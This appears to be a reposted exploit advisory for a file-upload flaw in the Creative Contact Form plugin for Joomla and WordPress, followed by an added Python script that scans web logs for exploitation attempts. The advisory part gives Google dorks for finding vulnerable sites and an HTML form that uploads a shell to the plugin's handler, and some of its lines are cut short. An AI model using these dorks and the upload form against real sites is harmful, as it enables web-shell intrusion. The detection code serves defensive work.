
Creative Contact Form Shell Upload Vulnerability ( Joomla & Wordpress )

Saturday, 26 December 2015

#- Title: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#- Author: Vulnerability discovered by Gianni Angelozzi
                  Exploit written by Claudio Viviani
#- Date: 2014-10-25
#- Developer : creative-solutions .net
#- Link Download : creative-solutions .net/joomla/creative-contact-form
                               creative-solutions .net/wordpress/creative-contact-form
#- Google Dork: inurl:"/sexy-contact-form/" (wordpress )
                           inurl:com_creativecontactform ( joomla )
#- Fixed in Version : wp > 0.9.7 Joomla>2.0.0
#- Tested on : Backbox
===================================================

-- Proof Of Concept --
When Vuln : {"files":
CSRF : 
<form method="POST" action="http://target. com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Shell Path : Here
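
Added example (not part of the original advisory or exploit): a defender-side check that scans web server access logs for POST requests to the plugin's fileupload handler, using the component and plugin directory names listed above. The Combined Log Format, the function name find_upload_hits and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Directory markers taken from the advisory above: the two Joomla component
# names and the WordPress plugin directory from the dork.
MARKERS = ("com_sexycontactform", "com_creativecontactform", "/sexy-contact-form/")

# Assumed log layout (Combined Log Format):
# ip - user [time] "METHOD path proto" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_hits(lines):
    """Return {client_ip: [(time, path, status), ...]} for every POST that
    targets the fileupload handler under one of the marked directories."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Ignore the query string and compare case-insensitively.
        path = m["path"].split("?", 1)[0].lower()
        if "/fileupload/" in path and any(k in path for k in MARKERS):
            hits[m["ip"]].append((m["time"], m["path"], int(m["status"])))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Oct/2014:10:01:02 +0000] "GET /index.php?option=com_creativecontactform HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Oct/2014:10:05:40 +0000] "POST /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 200 312 "-" "python-requests"',
    '203.0.113.9 - - [25/Oct/2014:10:05:44 +0000] "POST /components/com_creativecontactform/fileupload/index.php HTTP/1.1" 404 210 "-" "python-requests"',
    '198.51.100.7 - - [25/Oct/2014:10:07:00 +0000] "POST /index.php/contact HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_upload_hits(SAMPLE_LOG).items():
        for when, path, status in events:
            note = "handler responded, review host" if status == 200 else "no handler"
            print(f"{ip} {when} {path} -> {status} ({note})")
```

Any hit with status 200 on a site running a version older than the fixed releases named above is a reason to inspect the plugin's directories for unexpected files and to upgrade.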
 
